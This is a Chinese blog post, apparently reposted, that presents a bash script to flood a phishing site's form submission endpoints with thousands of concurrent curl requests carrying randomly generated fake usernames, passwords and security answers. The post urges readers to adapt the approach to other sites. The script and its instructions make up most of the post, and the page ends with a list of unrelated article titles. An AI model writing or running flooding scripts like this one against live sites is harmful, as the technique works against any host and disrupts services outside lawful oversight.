给钓鱼邮件最致命的一击
来源:互联网 发布:骨朵网络影视数据查询 编辑:程序博客网 时间:2024/04/29 20:15
现在的小偷、骗子太多了,被偷的东西需要解除原有的Apple ID才可以绑定新的apple id,于是各种欺骗邮件纷纷到来进行诈骗,今天告诉大家怎么讲该死的诈骗服务器搞死。
1.原理:向诈骗邮件提交各种用户名、密码、验证信息,这些信息看着像那么回事;shell信息,采用多线程,不断将垃圾信息塞到骗子的数据库中,使其应接不暇,最后绝命而死。
2 代码
#!/bin/bashmkfifo fd2exec 9<>fd2echo -n -e "1\n1\n1\n" 1>&9for((i=0;i<2000;i++))doread -u 9{ curl 'http://www.rebn.xyz/fish/password/submit_q' -H 'Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22b0a96ff73d18584648001410103231e8%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22159.226.43.96%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_10_1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F40.0.2214.91+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1422254382%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A2%3A%22id%22%3Bi%3A137%3B%7D8a096a4981e184082bc2b5adbdc13f15' -H 'RA-Sid: 9FE22B60-20141024-071647-6043cd-3135f4' -H 'Origin: http://www.rebn.xyz' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: zh-CN,zh;q=0.8' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Cache-Control: max-age=0' -H 'Referer: http://www.rebn.xyz/fish/password/question' -H 'Connection: keep-alive' -H 'RA-Ver: 2.8.7' -H 'DNT: 1' --data 'q1=%E4%BD%A0%E5%AD%A6%E4%BC%9A%E5%81%9A%E7%9A%84%E7%AC%AC%E4%B8%80%E9%81%93%E8%8F%9C%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F&s1=ewtretertret&q2=%E4%BD%A0%E4%B8%8A%E5%B0%8F%E5%AD%A6%E6%97%B6%E6%9C%80%E5%96%9C%E6%AC%A2%E7%9A%84%E8%80%81%E5%B8%88%E5%A7%93%E4%BB%80%E4%B9%88%EF%BC%9F&s2=ertert&q3=%E4%BD%A0%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AA%E4%B8%8A%E5%8F%B8%E5%8F%AB%E4%BB%80%E4%B9%88%E5%90%8D%E5%AD%97%EF%BC%9F&s3=ertertertert&date=20120508&appleId=' --compressed#curl 'http://www.rebn.xyz/fish/home/add_info' --data "username=sdfsdf@13123.com&userpass=erwe.com"name=''host=''pasword=''name=`openssl rand -base64 8 |cut -b 1-7`host=`openssl rand -base64 8 |cut -b 1-6`pasword=`openssl rand -base64 18 |cut -b 1-15`curl 'http://www.rebn.xyz/fish/home/add_info' -H 'Accept: text/plain, */*; q=0.01' -H 'Referer: http://www.rebn.xyz/fish/index/?UHFTR=7115' -H 'Origin: http://www.rebn.xyz' -H 'X-Requested-With: XMLHttpRequest' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' --data 'username='${name}'%40'${host}'.com&userpass='${pasword} --compressedsleep 1echo "$REPLY"echo -ne "1\n" 1>&9} &donewaitrm -f fd2
3.保存为battle.sh,执行
sh battle.sh4.主要工作原理:使用openssl产生一些随机数,包括用户名、email主机信息以及密码,然后通过curl命令构建表单数据攻击,其他部分就是并发操作了。其它的钓鱼网站,各位可以通过查看源代码的方式,获取其提交的地址,构建相对应的攻击代码。
0 0
- 给钓鱼邮件最致命的一击
- 手游产品经理初探(六)粗糙的logo会给产品致命一击
- 微信电商——对阿里的致命一击
- 楼市将遭遇致命一击
- MtGox破产,对比特币是致命一击
- 看不见的弹痕最致命
- Laravel收发邮件一个致命的错误
- Laravel收发邮件一个致命的错误
- 钓鱼邮件初探:黑客是如何进行邮件伪造的?
- [转贴]巨鹿之战 ——大秦最致命一击
- 米兰2:2战平巴萨 席尔瓦最后关头致命一击
- 看iPad 3如何对微软施以“致命一击”
- 周鸿祎花巨资做广告 给付费杀毒致命一击
- swaks伪造钓鱼邮件
- 职业生涯的12个最致命想法
- 上班族最致命的十种生活方式
- 人一生中最致命的八个问题
- 人一生中最致命的八个问题
- 驱动 之 makefile 详解
- MongoDB用户管理
- Android性能优化典范
- Jxl使用总结
- 基于CMOS模拟开关实现平衡混频器
- 给钓鱼邮件最致命的一击
- HDU3117 Fibonacci Numbers 【通项公式】
- Java笔记十三.常用API-Runtime、Runable、System类
- Sencha学习笔记1: Getting Started with Sencha Touch - 官方Sencha Touch入门指南
- windows操作系统下java程序使用sigar的使用问题
- hdu 1114 Piggy-Bank 完全背包
- 安卓开发笔记(二) Android使用AttributeSet自定义控件的方法
- 1007 正整数分组
- You Are All Excellent(余弦排比0~180)